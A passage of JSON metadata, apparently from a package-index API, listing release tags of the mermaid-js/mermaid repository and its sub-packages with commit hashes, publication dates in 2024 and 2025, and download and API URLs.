name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/t